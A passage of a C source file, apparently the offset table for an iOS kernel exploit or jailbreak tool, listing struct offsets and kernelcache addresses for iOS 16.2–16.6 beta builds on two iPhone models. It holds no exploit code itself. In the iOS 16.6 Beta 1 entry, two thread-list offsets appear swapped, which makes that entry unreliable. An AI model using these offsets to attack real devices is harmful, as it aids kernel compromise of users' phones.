0xfffffff00a381190, .kernelcache__gPhysBase = 0xfffffff0078581b0, .kernelcache__gPhysSize = 0xfffffff0078581b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007856390, .kernelcache__perfmon_devices = 0xfffffff00a3bc3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed905c, .kernelcache__ptov_table = 0xfffffff00780b3b0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3bb800, .kernelcache__vm_pages = 0xfffffff0078080d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00780a370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3bb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f29074, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D67", .device_id = "iPhone14,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381190, .kernelcache__gPhysBase = 0xfffffff0078581b0, .kernelcache__gPhysSize = 0xfffffff0078581b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007856390, .kernelcache__perfmon_devices = 0xfffffff00a3bc3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed905c, .kernelcache__ptov_table = 0xfffffff00780b3b0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3bb800, .kernelcache__vm_pages = 0xfffffff0078080d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00780a370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3bb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f29074, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E247", .device_id = "iPhone14,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a465208, .kernelcache__gPhysBase = 0xfffffff007937fc0, .kernelcache__gPhysSize = 0xfffffff007937fc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007936198, .kernelcache__perfmon_devices = 0xfffffff00a4a3520, .kernelcache__perfmon_dev_open = 0xfffffff007ef9210, .kernelcache__ptov_table = 0xfffffff0078eb180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4a2990, .kernelcache__vm_pages = 0xfffffff0078e7ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ea130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4a2988, .kernelcache__vn_kqfilter = 0xfffffff007f45ae0, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E252", .device_id = "iPhone14,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a465208, .kernelcache__gPhysBase = 0xfffffff007937fc0, .kernelcache__gPhysSize = 0xfffffff007937fc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007936198, .kernelcache__perfmon_devices = 0xfffffff00a4a3520, .kernelcache__perfmon_dev_open = 0xfffffff007ef9210, .kernelcache__ptov_table = 0xfffffff0078eb180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4a2990, .kernelcache__vm_pages = 0xfffffff0078e7ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ea130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4a2988, .kernelcache__vn_kqfilter = 0xfffffff007f45ae0, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:09:37 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8110", .build_version = "20F66", .device_id = "iPhone14,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a471208, .kernelcache__gPhysBase = 0xfffffff00793c100, .kernelcache__gPhysSize = 0xfffffff00793c100 + 0x8, .kernelcache__gVirtBase = 0xfffffff00793a2d8, .kernelcache__perfmon_devices = 0xfffffff00a4af520, .kernelcache__perfmon_dev_open = 0xfffffff007efd480, .kernelcache__ptov_table = 0xfffffff0078ef180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ae990, .kernelcache__vm_pages = 0xfffffff0078ebec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ee130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ae988, .kernelcache__vn_kqfilter = 0xfffffff007f49fe8, }, // iOS 16.6 Beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:16:18 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8110", .build_version = "20G5026e", .device_id = "iPhone14,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x380 - 0x18, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x80 - 0x28, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000,//good .kernelcache__cdevsw = 0xfffffff00a519a30, //good .kernelcache__gPhysBase = 0xfffffff0079502a8, //good .kernelcache__gPhysSize = 0xfffffff0079502b0, //good .kernelcache__gVirtBase = 0xfffffff00794e460, //good .kernelcache__perfmon_devices = 0xfffffff00a559550, //good .kernelcache__perfmon_dev_open = 0xfffffff007f1db9c, //good .kernelcache__ptov_table = 0xfffffff0079039c0, //good .kernelcache__vm_first_phys_ppnum = 0xfffffff00a558910, //good .kernelcache__vm_pages = 0xfffffff007900110, //good .kernelcache__vm_page_array_beginning_addr = 0xfffffff007902970, //good .kernelcache__vm_page_array_ending_addr = 0xfffffff00a558908, //good .kernelcache__vn_kqfilter = 0xfffffff007f6a0b8, //good }, // End iPhone 13 Pro Max // // Start iPhone 13 // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:56 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8110", .build_version = "20C65", .device_id = "iPhone14,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a379190, .kernelcache__gPhysBase = 0xfffffff0078580c8, .kernelcache__gPhysSize = 0xfffffff0078580c8 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078562a8, .kernelcache__perfmon_devices = 0xfffffff00a3b43b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed8fa8, .kernelcache__ptov_table = 0xfffffff00780b370, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3b3800, .kernelcache__vm_pages = 0xfffffff007808098, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00780a330, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3b37f8, .kernelcache__vn_kqfilter = 0xfffffff007f28fd0, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D47", .device_id = "iPhone14,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381190, .kernelcache__gPhysBase = 0xfffffff0078581b0, .kernelcache__gPhysSize = 0xfffffff0078581b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007856390, .kernelcache__perfmon_devices = 0xfffffff00a3bc3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed905c, .kernelcache__ptov_table = 0xfffffff00780b3b0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3bb800, .kernelcache__vm_pages = 0xfffffff0078080d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00780a370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3bb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f29074, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D67", .device_id = "iPhone14,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381190, .kernelcache__gPhysBase = 0xfffffff0078581b0, .kernelcache__gPhysSize = 0xfffffff0078581b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007856390, .kernelcache__perfmon_devices = 0xfffffff00a3bc3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed905c, .kernelcache__ptov_table = 0xfffffff00780b3b0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3bb800, .kernelcache__vm_pages = 0xfffffff0078080d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00780a370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3bb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f29074, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E247", .device_id = "iPhone14,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 